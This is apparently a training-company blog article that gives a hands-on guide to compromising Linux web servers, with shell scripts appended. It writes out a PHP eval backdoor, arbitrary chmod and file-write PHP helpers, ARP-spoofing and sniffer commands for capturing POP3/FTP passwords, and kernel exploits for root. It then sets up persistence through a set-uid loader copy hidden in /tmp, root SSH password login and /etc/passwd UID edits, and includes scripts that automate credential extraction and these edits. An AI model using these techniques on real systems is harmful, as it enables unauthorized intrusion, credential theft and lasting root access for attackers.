Step‑by‑Step Linux Privilege Escalation and Exploit Techniques

This guide walks through creating a PHP backdoor, leveraging Python pty for interactive shells, compiling and using arpsniffer and linsniffer, performing network sniffing with tcpdump, applying various Linux privilege‑escalation exploits, and establishing persistent root access on vulnerable systems.

MaGe Linux Operations

Write a one-line PHP backdoor (the POST field name, here md5, doubles as the shell's "password"; the original omits the quotes, which PHP 8 rejects as an undefined constant):

<?php @eval($_POST['md5']); ?>

Upload the file to the target server and verify that it is reachable and executes.

1. Initial enumeration and cross-site (cross-directory) access

From the web shell, list the document roots of the other sites on the same server (e.g., ls -la /www.users/) to locate writable locations. On shared hosting this "cross-site" access depends on lax directory permissions between virtual hosts, not on any browser-side scripting.

2. Privilege escalation via local exploits

Obtain an interactive shell using Python:

python -c 'import pty; pty.spawn("/bin/sh")'

Then check the current user ID and kernel version:

id
uname -r

Linux privilege-escalation methods fall into three groups: vulnerabilities in third-party software, abuse of trusted local features (set-uid binaries, cron jobs, sudo rules, writable configuration), and kernel overflows. The kernel version from uname -r decides which kernel exploit, if any, applies. Useful exploit repositories:

http://tools.90sec.org/

http://sebug.net/paper/linux_exp/

http://x73.cc/bitch/exp/

http://www.exploit-db.com/search/

Compile the chosen exploit (e.g., gcc -o 2 2.c) and set execution permissions (chmod +x 2). If the target has no compiler, build the exploit on a machine with the same architecture and libc and upload the binary to a writable directory.
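The enumeration and exploit-selection steps above, collected into one script. This is an added example, not code from the original article: the function names (kver_lt, fixed_in, enum_target) are mine, and the "fixed in" version passed to fixed_in is a placeholder that must come from the exploit's own notes, since this script carries no vulnerability database of its own.

```shell
#!/bin/sh
# Added example: local enumeration before choosing a kernel/udev exploit.

# kver_lt A B -> exit status 0 when kernel version A sorts before B.
# Release suffixes such as "-92.el5" or "-generic" are stripped first, so
# "2.6.18-92.el5" is compared as 2.6.18. Comparison is numeric per field.
kver_lt() {
    a=$(printf '%s' "$1" | sed 's/[^0-9.].*$//')
    b=$(printf '%s' "$2" | sed 's/[^0-9.].*$//')
    awk -v a="$a" -v b="$b" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, ".")
        k = (n > m) ? n : m
        for (i = 1; i <= k; i++) {
            p = x[i] + 0; q = y[i] + 0     # a missing component counts as 0
            if (p < q) exit 0
            if (p > q) exit 1
        }
        exit 1                             # equal is not "less than"
    }'
}

# fixed_in KVER FIXED -> "vulnerable" when the running kernel KVER predates
# the upstream release FIXED that closed the bug (FIXED is a placeholder
# you read from the exploit's README, not a value this script knows).
fixed_in() {
    if kver_lt "$1" "$2"; then echo vulnerable; else echo patched; fi
}

# enum_target: the checks the article runs by hand, plus the two lists
# (world-writable directories and set-uid binaries) that decide between a
# kernel exploit and abuse of a trusted local feature.
enum_target() {
    echo "== id ==";       id
    echo "== kernel ==";   uname -r
    echo "== distro ==";   (lsb_release -a 2>/dev/null || cat /etc/issue 2>/dev/null)
    echo "== gcc ==";      command -v gcc || echo "no compiler: build elsewhere for the same arch/libc"
    echo "== world-writable dirs (somewhere to drop the exploit) =="
    find / -xdev -type d -perm -0002 2>/dev/null | head -n 20
    echo "== set-uid binaries =="
    find / -xdev -type f -perm -4000 2>/dev/null
}

# Usage when run directly: ./enum.sh [FIXED_VERSION]
if [ "${0##*/}" = "enum.sh" ]; then
    enum_target
    [ -n "$1" ] && echo "kernel $(uname -r) vs fix $1: $(fixed_in "$(uname -r)" "$1")"
fi
```

The version comparison is the part people get wrong by hand: a string comparison ranks 2.6.9 above 2.6.18, which is exactly the mistake that leads to running the wrong exploit on a kernel and panicking the box.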

Install required libraries for arpsniffer.c:

rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz
tar zxvf libpcap-0.8.1.tar.gz
cd libpcap-0.8.1 && ./configure && make && make install

Recompile arpsniffer.c:

gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

Run the sniffer to spoof the gateway and capture traffic:

./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110

Capture packets with tcpdump:

tcpdump -i eth0 host 192.168.0.11
tcpdump -i eth0 host 172.16.0.12 -w pop.txt

Note that -w writes a binary pcap file whatever the extension, so pop.txt is not readable as text: analyze it with Wireshark (or tcpdump -r pop.txt -A) and look for the plaintext USER/PASS exchanges of POP3 and FTP to extract usernames and passwords.

Modify linsniffer.c to monitor the ports you care about (FTP, SSH, Telnet, HTTP, POP3, etc.) and compile it:

gcc -o linsniffer linsniffer.c

Run the sniffer in the background; captured session data, including any credentials sent in the clear, is saved in tcp.log.
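Pulling the logins back out of the sniffer log is the step the article leaves to the reader. The following is an added example, not the article's or linsniffer's code: it assumes a tcp.log layout of a "client => server [port]" header, the raw client bytes, and a "----- [FIN]" trailer, which you should check against the log your build actually writes, and the sample log it creates is constructed, not a real capture.

```shell
#!/bin/sh
# Added example: extract POP3/FTP credentials from a linsniffer-style tcp.log.

# write_sample_log PATH -> writes a constructed sample log (not a real capture).
write_sample_log() {
    cat > "$1" <<'EOF'
192.168.0.11 => 172.16.0.12 [110]
USER alice@example.com
PASS s3cret
STAT
QUIT
----- [FIN]
192.168.0.11 => 172.16.0.12 [21]
USER ftpadmin
PASS Summer2009!
PWD
----- [FIN]
192.168.0.11 => 172.16.0.12 [22]
SSH-2.0-OpenSSH_4.3
----- [FIN]
EOF
}

# extract_creds LOGFILE -> one line per completed USER/PASS pair:
#   "<client> <server> <port> <user> <password>"
# Only clear-text protocols (FTP, POP3) produce a line; an SSH session has
# no USER/PASS commands and is skipped. A PASS without a preceding USER in
# the same session is ignored rather than paired with a stale user name.
extract_creds() {
    awk '
        /^[0-9.]+ => [0-9.]+ \[[0-9]+\]$/ {      # session header
            client = $1; server = $3
            port = $4; gsub(/\[|\]/, "", port)
            user = ""; next
        }
        /^----- / { user = ""; next }              # end of session
        toupper($1) == "USER" { user = $2; next }
        toupper($1) == "PASS" && user != "" {
            print client, server, port, user, $2
            user = ""
        }
    ' "$1"
}

# Usage when run directly: ./creds.sh [tcp.log]
if [ "${0##*/}" = "creds.sh" ]; then
    extract_creds "${1:-tcp.log}"
fi
```

The same awk body works on tcpdump -A output once the header pattern is adjusted to tcpdump's "src.port > dst.port" line format.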

3. Cross-site (cross-directory) PHP helpers

Despite the original label, these are not cross-site scripting; they are small PHP files dropped on a shared host to reach paths outside the current site. PHP code to change the permissions of an arbitrary path:

<?php
// tmdsb.php: chmod an attacker-supplied path to 0777 (deliberately unsafe helper)
$path = stripslashes($_GET['path']);
$ok = chmod($path, 0777);
if ($ok) echo "CHMOD OK";
?>

Save as tmdsb.php and invoke it with a crafted path parameter (tmdsb.php?path=<target directory>). It only succeeds where the web server's user already owns the path, which is why the directory listing from step 1 matters.

Another PHP snippet to append arbitrary data to a file:

<?php
// append POSTed data to an attacker-supplied file; @ suppresses errors so
// a failed write leaves no trace in the server's error log
$filename = stripslashes($_POST['filename']);
$mess = stripslashes($_POST['mess']);
$fp = @fopen($filename, 'a');
@fputs($fp, $mess);
@fclose($fp);
?>

4. Kernel and udev exploits for root

Compile and run kernel-level exploits (e.g., pwnkernel.c, wunderbar_emporium.sh, exploit.c) to obtain a local root shell. Which one applies depends on the kernel and udev versions found during enumeration; read the exploit's own notes for the affected range first, since a kernel exploit run against the wrong version can crash the machine.

Once root, create a set-uid backdoor from a copy of the dynamic loader:

cp /lib/ld-linux.so.2 /tmp/.str1ven
chmod +s /tmp/.str1ven

(The original gives chmod +s .str1ven, which only works with /tmp as the working directory.) Because the copy is root-owned and set-uid, running it later as an unprivileged user with a program as its argument, e.g. /tmp/.str1ven /bin/sh, starts that program with effective uid 0. Two caveats: the bit is ignored if /tmp is mounted nosuid, and bash drops the effective uid unless started with -p, so /bin/sh or bash -p is the usual choice. Defenders find this with a search for set-uid files outside the system directories (find / -perm -4000 -type f).

Useful system commands for post‑exploitation:

cat /etc/passwd
cat /etc/shadow
ifconfig
netstat -an | grep LISTEN
service --status-all
lsb_release -a

Modify the SSH daemon configuration (/etc/ssh/sshd_config) so root can log in with a password: set PermitRootLogin yes and PasswordAuthentication yes (the original names only the second directive, which on its own does not allow root logins), then restart the service.

Additional tricks once root is obtained include editing /etc/passwd directly, using sed to change a user's UID/GID fields (0:0 makes the account root-equivalent), and creating large files that certain kernel exploits need as scratch space.
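The three persistence edits from this section (the set-uid loader copy, the sshd_config change, and the sed on /etc/passwd), written as functions that take the file path as an argument so they can be rehearsed on copies before touching /etc. This is an added example, not the article's code; the function names (install_suid_loader, mount_has_nosuid, set_sshd_opt, set_passwd_ids, passwd_ids) are mine, and the sample config and passwd lines used in testing are constructed.

```shell
#!/bin/sh
# Added example: persistence edits as reusable functions.

# mount_has_nosuid PATH -> 0 if the filesystem holding PATH is mounted nosuid.
# A set-uid copy on such a mount (common for /tmp) runs with the caller's own
# uid, so the backdoor silently does nothing. Returns 1 when /proc/mounts is
# unavailable, i.e. "not known to be nosuid".
mount_has_nosuid() {
    [ -r /proc/mounts ] || return 1
    mp=$(df -P "$1" | awk 'NR == 2 { print $NF }')
    awk -v mp="$mp" '$2 == mp { print $4 }' /proc/mounts | grep -qw nosuid
}

# install_suid_loader SRC DST -> copy SRC (the article uses /lib/ld-linux.so.2)
# to DST with the set-uid bit set and print the resulting mode. Only a copy
# made as root is root-owned; run as a normal user it just rehearses the bit.
install_suid_loader() {
    cp "$1" "$2" && chmod 4755 "$2" || return 1
    if mount_has_nosuid "$2"; then
        echo "warning: filesystem holding $2 is nosuid, the bit will be ignored" >&2
    fi
    stat -c %a "$2"
}

# set_sshd_opt FILE KEY VALUE -> set, or uncomment and set, one sshd_config
# directive. For the real file:
#   set_sshd_opt /etc/ssh/sshd_config PermitRootLogin yes
#   set_sshd_opt /etc/ssh/sshd_config PasswordAuthentication yes
# followed by a restart of sshd. Written via a temp file so it does not
# depend on GNU sed -i.
set_sshd_opt() {
    f=$1; k=$2; v=$3
    if grep -Eq "^[#[:space:]]*$k[[:space:]]" "$f"; then
        sed -E "s|^[#[:space:]]*$k[[:space:]].*|$k $v|" "$f" > "$f.tmp" && mv "$f.tmp" "$f"
    else
        printf '%s %s\n' "$k" "$v" >> "$f"
    fi
}

# set_passwd_ids FILE USER UID GID -> rewrite only the uid and gid fields of
# USER in a passwd-format file (the "sed to change UID/GID" trick).
set_passwd_ids() {
    sed -E "s/^($2):([^:]*):[0-9]+:[0-9]+:/\1:\2:$3:$4:/" "$1" > "$1.tmp" && mv "$1.tmp" "$1"
}

# passwd_ids FILE USER -> "uid:gid" as stored, to verify the edit.
passwd_ids() {
    awk -F: -v u="$2" '$1 == u { print $3 ":" $4 }' "$1"
}
```

Rehearse on copies: copy /etc/ssh/sshd_config and /etc/passwd to a scratch directory, run the functions there, and diff against the originals before applying them for real; a malformed passwd line locks everyone out, including the attacker.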

Tags: Information Security, privilege escalation, Exploit, php backdoor
Written by

MaGe Linux Operations

Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
